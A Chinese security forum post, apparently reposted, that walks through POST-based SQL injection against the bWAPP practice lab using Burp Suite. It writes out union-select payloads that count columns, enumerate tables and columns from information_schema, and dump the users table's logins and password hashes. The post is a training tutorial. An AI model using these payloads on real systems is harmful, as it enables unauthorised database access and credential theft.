安全矩阵

 找回密码
 立即注册
搜索
查看: 6082|回复: 0

Web安全(二)SQL注入[二]

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-11-18 22:18:31 | 显示全部楼层 |阅读模式
原文链接:web安全(二)SQL注入[二]

POST型SQL注入

在HTTP常用方法中,POST方法提交的信息不存储与URL,而是存储在HTTP实体内容中,在大多的提交过程,用户是无感知的。且注入信息是存储于HTTP实体内容中而不是URL,通过改造实体内容,达到实际执行的SQL语句获取更多信息的目的。


示例

1.开启bwapp漏洞环境,如下图选择SQL injection(POST/Select),级别选择low。




2.开启burpsuite,点击GO抓包。





3.如下图,将抓到的指定的包发送到Repeater模块



4.如下图,输入英文单引号测试。发现报错,说明存在注入点。


5.然后用order by 从order by 1开始递增,直到order by 8,发现报错,说明字段数为7。




6.用联合查询,查看哪些字段可以回显。
  1. '' union select 1,2 3,4,5,6,7
复制代码

由下图可以看出,2,3,4,5可以回显。




7.查看数据库相关信息,成功回显相关信息,但回显的信息只有1条而无法获得所有表名。
  1. '' union select 1,database(),user(),version(),table_name,6,7 from information_schema.tables where table_schema=database()
复制代码



8.使用group_concat()函数,回显所有表名。
  1. '' union select 1,database(),user(),version(),group_concat(table_name),6,7 from information_schema.tables where table_schema=database()
复制代码




9.显示表的字段。
  1. ='' union select 1,database(),user(),version(),group_concat(column_name),6,7 from information_schema.columns where table_name='users'
复制代码




10.表结构已经知道,直接查询用户名和密码。密码已加密,解密方法见Web安全(二)SQL注入[一]

  1. ='' union select 1,database(),user(),group_concat(password),group_concat(login),6,7 from users
复制代码






















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 11:42 , Processed in 0.012559 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表